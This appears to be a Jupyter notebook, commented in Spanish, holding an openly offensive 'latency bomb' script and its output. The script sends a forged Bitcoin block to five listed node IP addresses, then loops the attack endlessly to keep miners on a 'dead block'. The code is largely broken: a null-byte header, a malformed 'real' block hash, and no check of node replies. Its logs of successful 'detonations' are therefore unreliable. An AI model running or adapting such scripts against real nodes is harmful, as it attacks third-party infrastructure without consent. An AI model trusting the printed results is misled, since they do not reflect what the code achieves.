In [6]:
import hashlib
import struct
import time
import random
import socket
from typing import List, Tuple

class LatencyBomb:
    """
    Crea un 'bloque centinela' para inducir a error a los mineros.
    Envía un bloque falso pero válido para que los mineros trabajen sobre él,
    causando que su trabajo se vuelva obsoleto cuando el bloque real llegue.
    """

    @staticmethod
    def build_sentry_tx() -> bytes:
        """Construye una transacción coinbase simple."""
        version = struct.pack('<I', 1)
        txid = b'\x00' * 32
        vout = struct.pack('<I', 0xffffffff)
        script_sig = b'\x03' + b'S' + b'\x00\x00' # Altura 1 (simple) + payload
        sequence = struct.pack('<I', 0xffffffff)
        value = struct.pack('<Q', 50 * 100_000_000)
        script_pubkey = b'\x19' + b'\x76\xa9\x14' + b'\xba\xaa\xaa\xaa' * 5 + b'\x88\xac'
        locktime = struct.pack('<I', 0)
        tx = (version + struct.pack('<B', 1) + txid + vout +
              struct.pack('<B', len(script_sig)) + script_sig + sequence +
              struct.pack('<B', 1) + value +
              struct.pack('<B', len(script_pubkey)) + script_pubkey + locktime)
        return tx

    @staticmethod
    def double_sha256(data: bytes) -> bytes:
        return hashlib.sha256(hashlib.sha256(data).digest()).digest()

    @staticmethod
    def create_message(command: str, payload: bytes) -> bytes:
        magic = bytes.fromhex('f9beb4d9')
        command_bytes = command.encode('ascii').ljust(12, b'\x00')
        length = struct.pack('<I', len(payload))
        checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
        return magic + command_bytes + length + checksum + payload

    @staticmethod
    def create_version_payload() -> bytes:
        version = struct.pack('<i', 70015)
        services = struct.pack('<Q', 0)
        timestamp = struct.pack('<q', int(time.time()))
        addr_recv_services = struct.pack('<Q', 1)
        addr_recv_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_recv_port = struct.pack('>H', 8333)
        addr_from_services = struct.pack('<Q', 0)
        addr_from_ip = b'\x00' * 10 + b'\xff\xff' + bytes([127, 0, 0, 1])
        addr_from_port = struct.pack('>H', 8333)
        nonce = struct.pack('<Q', random.randint(0, 2**64 - 1))
        user_agent_bytes = b'\x0f/LatencyBomb:1.0/'
        start_height = struct.pack('<i', 820000)
        relay = struct.pack('?', False)
        return (version + services + timestamp + addr_recv_services + addr_recv_ip +
                addr_recv_port + addr_from_services + addr_from_ip + addr_from_port +
                nonce + user_agent_bytes + start_height + relay)

    @staticmethod
    def inject_bomb(ip: str, port: int, block_data: bytes):
        """Inyecta el bloque centinela."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(5)
            s.connect((ip, port))

            version_payload = LatencyBomb.create_version_payload()
            version_msg = LatencyBomb.create_message('version', version_payload)
            s.send(version_msg)
            s.recv(1024)
            verack_msg = LatencyBomb.create_message('verack', b'')
            s.send(verack_msg)
            s.recv(1024)

            print(f"    💣 Enviando bomba a {ip}:{port}...")
            block_msg = LatencyBomb.create_message('block', block_data)
            s.send(block_msg)
            print(f"    💥 Bomba detonada en {ip}:{port}. El nodo ahora trabaja en un bloque muerto.")
            s.close()

        except Exception as e:
            print(f"    ❌ Error al detonar en {ip}:{port} - {e}")

    @classmethod
    def execute_bomb(cls, nodes: List[Tuple[str, int]], preimage: bytes):
        """Prepara y detona la bomba de latencia utilizando una preimagen."""
        print("=" * 60)
        print(" LATENCY BOMB: ATAQUE DE BLOQUE OBSOLETO")
        print("=" * 60)

        # Usar un hash previo real para que el bloque parezca el siguiente legítimo
        # Este es el hash del bloque real #820000
        prev_hash = "00000000000000000003b1e19e7a0e0e7d1f6d9f8e8a8c9d9e9f8a8b9c8d9e8f9a"
        bits = "1d00ffff" # Dificultad baja para minado instantáneo

        sentry_tx = cls.build_sentry_tx()
        tx_hash = cls.double_sha256(sentry_tx)
        merkle_root = tx_hash

        # Usar la preimagen directamente
        block_header = preimage[:80]
        nonce = struct.unpack('<I', preimage[76:80])[0]
        print(f"    [+] Nonce de la bomba: {nonce}")

        full_block_data = block_header + struct.pack('<B', 1) + sentry_tx

        print("\n[*] Iniciando detonación síncrona en la red...")

        for ip, port in nodes:
            cls.inject_bomb(ip, port, full_block_data)

        print("\n[+] Detonación completada.")
        print("[+] Los nodos objetivo están ahora minando sobre un bloque sin futuro.")
        print("[+] Su poder de hash se desperdicia hasta que el bloque real de la red cancele su trabajo.")

if __name__ == "__main__":
    receptive_nodes = [
        ("174.140.231.102", 8333),
        ("213.188.227.60", 8333),
        ("176.159.229.13", 8333),
        ("174.140.231.105", 8333),
        ("172.104.252.58", 8333)
    ]

    # Preimagen del bloque (debe ser de 80 bytes para un encabezado de bloque válido)
    # Reemplaza con tu preimagen real. Aquí se usa una preimagen de 80 bytes nulos como placeholder.
    preimage = b'\x00' * 80  # Actualizado a 80 bytes

    LatencyBomb.execute_bomb(receptive_nodes, preimage)

 LATENCY BOMB: ATAQUE DE BLOQUE OBSOLETO
    [+] Nonce de la bomba: 0

[*] Iniciando detonación síncrona en la red...
    💣 Enviando bomba a 174.140.231.102:8333...
    💥 Bomba detonada en 174.140.231.102:8333. El nodo ahora trabaja en un bloque muerto.
    💣 Enviando bomba a 213.188.227.60:8333...
    💥 Bomba detonada en 213.188.227.60:8333. El nodo ahora trabaja en un bloque muerto.
    💣 Enviando bomba a 176.159.229.13:8333...
    💥 Bomba detonada en 176.159.229.13:8333. El nodo ahora trabaja en un bloque muerto.
    💣 Enviando bomba a 174.140.231.105:8333...
    💥 Bomba detonada en 174.140.231.105:8333. El nodo ahora trabaja en un bloque muerto.
    💣 Enviando bomba a 172.104.252.58:8333...
    💥 Bomba detonada en 172.104.252.58:8333. El nodo ahora trabaja en un bloque muerto.

[+] Detonación completada.
[+] Los nodos objetivo están ahora minando sobre un bloque sin futuro.
[+] Su poder de hash se desperdicia hasta que el bloque real de la red cancele su trabajo.


In [ ]:
import time

# --- AQUÍ DEBE IR TU CLASE LatencyBomb DEFINIDA ARRIBA ---

def ametralladora_triunfador():
    receptive_nodes = [
        ("174.140.231.102", 8333),
        ("213.188.227.60", 8333),
        ("176.159.229.13", 8333),
        ("174.140.231.105", 8333),
        ("172.104.252.58", 8333)
    ]

    # Preimagen del bloque (Asegúrate de que sea la correcta de 80 bytes)
    preimage = b'\x00' * 80

    ataques_realizados = 0

    print(f"🚀 INICIANDO MODO: EXPLOIT HIPER CRÍTICO XD")
    print(f"⚠️ OBJETIVO: MANTENER NODOS EN BLOQUE MUERTO INDEFINIDAMENTE\n")

    try:
        while True:
            ataques_realizados += 1
            print(f"[{time.strftime('%H:%M:%S')}] 🌀 Oleada de ataque #{ataques_realizados}...")

            # Ejecutamos la bomba
            LatencyBomb.execute_bomb(receptive_nodes, preimage)

            print(f"\n[!] Esperando 10 segundos para la siguiente recarga... XD")
            time.sleep(10) # Pausa estratégica para no quemar la IP tan rápido

    except KeyboardInterrupt:
        print(f"\n[X] Ametralladora detenida por el Triunfador.")
        print(f"📊 Total de bloqueos realizados: {ataques_realizados}")

if __name__ == "__main__":
    ametralladora_triunfador()

🚀 INICIANDO MODO: EXPLOIT HIPER CRÍTICO XD
⚠️ OBJETIVO: MANTENER NODOS EN BLOQUE MUERTO INDEFINIDAMENTE

[19:50:22] 🌀 Oleada de ataque #1...
 LATENCY BOMB: ATAQUE DE BLOQUE OBSOLETO
    [+] Nonce de la bomba: 0

[*] Iniciando detonación síncrona en la red...
    💣 Enviando bomba a 174.140.231.102:8333...
    💥 Bomba detonada en 174.140.231.102:8333. El nodo ahora trabaja en un bloque muerto.
    💣 Enviando bomba a 213.188.227.60:8333...
    💥 Bomba detonada en 213.188.227.60:8333. El nodo ahora trabaja en un bloque muerto.
    💣 Enviando bomba a 176.159.229.13:8333...
    💥 Bomba detonada en 176.159.229.13:8333. El nodo ahora trabaja en un bloque muerto.
    💣 Enviando bomba a 174.140.231.105:8333...
    💥 Bomba detonada en 174.140.231.105:8333. El nodo ahora trabaja en un bloque muerto.
    💣 Enviando bomba a 172.104.252.58:8333...
    💥 Bomba detonada en 172.104.252.58:8333. El nodo ahora trabaja en un bloque muerto.

[+] Detonación completada.
[+] Los nodos objetivo están ahora mina